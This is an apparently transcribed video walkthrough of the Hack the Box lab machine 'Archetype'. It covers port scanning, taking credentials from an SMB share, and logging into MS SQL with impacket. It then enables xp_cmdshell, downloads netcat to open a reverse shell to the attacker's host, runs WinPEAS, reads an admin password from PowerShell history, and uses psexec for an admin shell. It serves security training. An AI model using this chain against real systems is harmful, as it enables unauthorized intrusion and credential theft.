Hello, guys. Welcome back to episode 11 of our Hack the Box series. Today, we will be taking a look at the machine Archetype, and I've already started the machine. Now, let us go to the first task. Which TCP port is hosting a database server? All right, let's copy the IP and open up a new terminal. Nmap-f-sv and paste in the IP 10.129.95.187. Let us also open up the nodes. All right. Um, yep. So this is MS SQLS, which is an SQL server, and the TCP port is 1433. So let's input that in. Great. What is the name of the non-administrative share available over SMB? Let's take the hint. SMB clients will list shares. Administrative shares end in dollar sign. All right. Name of the non-administrative share. SMB client. So let us see if we have. Yes, we do have SMB client. And wait, have we done shares before? Oh, yes, it is here. So SMB client dash L. All right. So let us, it's dash N dash L. All right. So dash N dash L. And then the IP. Oh, paste clipboard. And we should get the shares. So we have already done SMB client in our machine that we did called dancing. So name of the non-administrative share available over SMB, it's backups. So that is the task two. Now, what is the password identified in the file on the SMB share? So let's I guess connect to um the client, I guess, or the share. So SMB client dash dash clipboard share name backups. So let us see. All right, ls, and we have prod.dts config pwd cd. Let's try going back and ls. All right, hold up. Or the password identified in the file connect with SMB client. All right, we have connected. Um, dot DTS config. Let's try getting prod dot DTS config. Getting file. Okay, I think it's done. Let's try. to see whether we have gotten the file. DTS config, value type configured, da, da, da. DTS configuration. All right, I don't think that is the file. We can actually check what a DTS config file is. Um, what is DTS config file? Data transformation services configuration file. SQL Server integration services which stores a comprehensive set of settings that govern the execution behavior. All right, so this is not something that we need. Let's exit and let's try um, connecting into maybe what is identified in the file on the SMB share. Okay, let's try $C, I suppose. Okay, never mind. Oh, sorry, it's C dollar. Free connect status access denied. How about admin dollar access denied? Um, can we just specify admin without the dollar? Bad network. Okay, so basically the only file that we could get was prod.dtsconfig, in which connections destination get generated from generated by generated date. Oh, there it is, the password. My bad. Let's copy and paste it in. So that is the password. Megacorp123. Great. What script from I'm packet collection can be used in order to establish an authenticated connection to a Microsoft SQL server? I am package examples can always help. Search for one related to the MS SQL. All right, what script? Okay, so let's see. So this data source, password, user ID, archetype, SQL, SVC, process security. All right, we'll keep that in mind. And I am packets if that, yep. Python classes for working with network protocols. Low-level programmatic access to the packets. All right. So what script can be used to establish an authenticated connection? I'm packet for MS SQL. It's a py file because as you can see the ending extension. Uh, I'm packet script for ah I think it is examples. So it is MS SQL client.py. All right. Okay. So let's just copy this, and that should be it. This script can be used in order to establish a connection, an authenticated connection to an SQL server. What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? Stored procedure can be used in order to spawn a Windows command shell. Penetration testing cheat sheets for Microsoft SQL Server will definitely help. Also, a transact SQL shell for Microsoft will bring useful results. All right. But what script? So extended stored procedure can be used in response. All right, so I think we should connect or make a connection to the MySQL or the SQL server. And in order to do that, let us see my MS SQL client.py to connect to MS SQL and Windows authentication when trying to log in. Um, Penetration testing. MS SQL could allow you to execute scripts in Python and or R. In Python, never mind. Um, all right, let's check this. Could provide us with some. Yep. All right. System tables, master database, MS model enumeration, nmap scripts, Metasploit, brute force, get user permissions, trusted links, read file, privilege escalation, PS script, um, add a startup, enable remote admin connect. All right. So hold up. Open source projects, offensive security, AM packet. All right. What protocols are featured? Maintainer, table of contents. So pip install IAM package. Let's try that. Eventually, the requirement already satisfied. All right, so it's already available. Um, here to get the latest stable release. All right, clipboard, no module. We could do pick, or actually we could also just run Python 3 im package user library distro packages Python 3 MS SQL client py. Um, all right. Open folder. Um, user lib Python 3 Python 3 distro packages. There should be im package. Yep. And examples MS SQL um MS SQL client MS SQL shell is available, but there is no MS SQL client, which is what we need. So what we can do is download the file, open up another folder from that, and we can do properties, um, copy location, paste it. All right, guys. So, you guys might notice a change in the volume. It is because I have gotten a new mic, so you guys can hear me a little better. And I am just trying to improve the quality of the tutorials. So, we have a new mic. All right. So let us continue with the MS SQL client. Yep. Um, so, right. So connecting or establishing a connection to the Microsoft SQL server. So let's do that. So yeah, it has displayed the options that we can use. So we can specify a lot of options here. Windows off, which is whether or not to use Windows authentication. Default is false. Authentication, connection, target IP. All right, so let's try Python. Well, this, and then um, we had already found the ID, which is archetype slash SQL underscore SVC. So let us mention that archetype slash SQL underscore svc at, and let's mention the IP address. So let's paste that, and then also mention Windows auth. And so we have the password as well, which is M3G4C0RP123. Switch. Hold up. Wait, is it not typing? G4C0RP123. Encryption required. All right. Let's see if we can purpose authentication, not that. Oh, domain slash username with the password, target name or address. At target address. All right. So I think the password must be mentioned. All right, got it. So I think it's supposed to be mentioned here with M3G4C0RP123 and description required G4C0RP123. I do not understand why it does not work. Positional arguments, domain, username, yes, with semicolon, password at the target name or address. Target's address is already mentioned. Huh. Maybe we need to provide a forward slash if that makes a difference. It does. All right. It does make a difference. It's supposed to be forward slash and not backward slash. So we have successfully authenticated into the SQL server with the ID, user ID and password. Now, what we can do is check for the penetration in MS SQL, and we are trying to execute OS commands. So I think we are supposed to see whether we can, or whether we are the system admin. So we can do that using this command right here. So let's try this. and it has returned a 1, which is true. So we are running as the sysadmin. So now what we need to be able to do. All right, so let's go back, and we have successfully authenticated. All right, that's good. Now, what extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? Um, extended stored procedure Microsoft SQL Server transaction shell. All right, so I think it is this right here. Execute commands. So we have to do some stuff for it, but this is the essential thing. XP underscore CMD shell. So XP underscore CMD shell. Yep, all right. Now, what script can be used in order to reach possible paths to escalate privileges? So first of all, let's come here and um let's see if the CMD shell is enabled. So let's try this. And yep, I don't think it is. So let's try to turn it on, enabling the command XP command shell. Configuration option, change from 0 to 1, run the reconfigure statement to install. All right, let's configure. All right, and then enable command shell. Change 0 to 1 and reconfigure. All right. Now, let's check um, whether we're able to run the command, I guess. And yep, it does work. So we successfully executed a command shell command, which is who am I, and we have gotten the output, which is archetype slash SQL underscore SVC, which is our user ID. So now we are able to upload or execute commands. Great. Now, what script can be used in order to search possible paths to escalate privileges? All right. Let's check a hint. P's for Windows. Script. All right. So let's check PS for Windows. Oh, it is a privilege escalation on some scripts. Okay. Open source software tool. It's a privilege escalation tool or enumeration tool. All right. So it should be WinPs. Great. So I think we might need to install. So what file contains the administrator's password? Okay. So let's see. So we might have to install WinPs. All right. So okay, now let's try to get the admin password or the file that contains the admin password. So file. Wimpies identified a file that keeps a history of what a user typed into a specific program. That keeps a history of what a user typed into a specific program. Okay, so all right, I think we should try downloading or actually let's try getting a reverse shell onto um, in order to execute commands. So we will upload an NC64 exe file to the target machine and execute the command exe process on our listening port. So in order to do that, let us start the Python, or sorry, not the Python, the HTTP server dot server on port 80, and it should be done. And then let's create a new tab and also create a ncat server 443, and this is the listening server. And then we can go into the SQL and execute cmd shell. Let's try PowerShell and print working directory. And we have the working current directory. So next what we can do is upload the NC64 exe file, which is the netcat file. So xp cmd shell PowerShell, change C is for command, change directory into C colon backslash users SQL underscore SVC downloads, which is where we have write permissions and not in any other directory. So let's download or upload the file onto the machine, the netcat file 10 dot hold up if config 10.10.14.18 slash, or actually I think it is 14, oh yeah, 14.18 slash nc64.exe out file nc64.exe, and that should invalid operation. All right, let's try with 14.9, and I think it is working. Let's just wait and see. So this is where we are uploading. Um, command web response exception, partial commands. All right, let's see. Unable to connect to the remote server. And in the other one, error code, message file not found. All right, it is actually 10 the 14.18, but I think we should first navigate into um, nc64.exe directory. So let's try to get this file. All right, and um, hmm, well, actually, should have worked. Because it does not matter. Other unable to connect to the remote server. Error response wget category info. All right, let me just figure this out and I'll be back. Yes, guys, so I have found out why this does not work, this command where we download NC64 does not work, because we have to start the Python server um, in the directory where we have downloaded the NC64 file. So we go to the GitHub link to download the NC64 file, which then gets downloaded into the downloads folder. And then from there, we have to change our directory into the downloads folder and then start the Python server. Copy, paste. All right. Similarly, this to the ncat server, we have to first go to downloads and then sudo nc lvnp 443. All right. And then we can run this command and hopefully it works. Exactly. So we get the output saying that there was a get for this and it has successfully run with the code 200. That is great. Now what we do is we bind the command.exe through the netcat listener to the listener. So what we do is we go change the directory into the downloads and then we execute the nc64.exe and then we do e for again execute command.exe 10.10.14.18, which is our tun0 address from ifconfig, and 443, which is the port that we are listening on. And when we go to our netcat, there it is. We have successfully gotten a reverse shell, which is stable. So a stable reverse shell. Now what we can do is um, see the file that contains the admin password. So let's try going to the desktop, or let's first try dir to get the directory. Download one file and two directories. So NC64, that is NC64. So let's try cd desktop. How about cd or all right, we have cd'd back, and we have all these directories. So let's cd into desktop and do dir to find, okay, there's a file user.txt, so type user.txt to view the contents, and there it is. So this is the, oh, that is the user flag, but what file contains the administrator's password? All right. Okay, we shall look into that, but we have the user flag, so let's copy that and paste it into our notes. All right, and then we can move on to WinPeas. So let's see that. So let's go to the Windows or the NC, and let's try to download WinPeas onto the machine. So what we can do is, first of all, download it locally on our machine. So WinPeas, second WinPeas x64 .exe, I think should be here. So quick start. WinPeas x64.exe, which is the one that we need. All right. And because it's already here, should be fine. We are already in the downloads folders. So what we can do is open up PowerShell. Great. And then we can wget the file from our Python server 14.18 slash winpeas x64.exe out file winpeas x64.exe. All right, And I think, yep, even that is successful. So now we can, I suppose, ls. Yep, there it is on the desktop. And we can, I suppose, execute win piece x64.exe. All right. Yep, it's doing its thing. That is quite a lot of output. Found APIs, regex. So I guess this is how we use searching hidden files. So it's an enumeration tool, WinPiece, used for enumerating any sort of vulnerabilities. All right, um let's use a hint again. Identify the file that keeps a history of what a user typed. So found secret keys. Um, let's see. Objects, backup file, database files, Windows files, roaming. All right, history files. There it is. So this is the history file. So let's copy that history of what users typed into specific program. So let's paste that. All right, submit the user flag, which we had already found from the desktop of the machine. So copy and let's paste that in. Great. And finally, the root flag. So for the root flag, what we have to do is, I suppose, change into this directory. So copy that. So cd, paste selection. All right, and then dir console host history. So type console host underscore history dot txt, and we get the keyboard or the what the user had typed into the machine. So we get the password of the administrator account. And now, in order to get an IM packet, we can use the IM packet to get a shell as the admin. So let us. All right, now in order to get a PowerShell or a shell as the admin, we have to download the psexec.py file, and then we must run that file. So let's copy this. Let's open up a new terminal. Let's paste it. psexec.py, and we must also mention as administrator at 10.129.95. Just paste clipboard, and that should be fine. We have found the password from, I suppose, all right, now this, yep, megacorp admin, so copy and paste that. Requesting shares, creating service, opening. All right, so we have signed in as the administrator. Now let's just display whatever is in the directory, and there are quite a lot of files, a lot of DLL files. I think the one that we need should be named flag or root.txt. That is a lot of files. All right, actually, let me just Control C that. All right, let's then try to cd into users, and let's do a dir administrator, so cd into administrator and cd into desktop probably, and dir, and there it is. So let's type root.txt, and there you go. That is the root flag. Sorry, it is copy, and we can paste it in here and submit it, and there you go. That is Archetype successfully pawned. Well, thank you guys for watching. I think this video has been quite long, but we have successfully another machine. Thank you guys for watching, and I'll see you guys in the next one.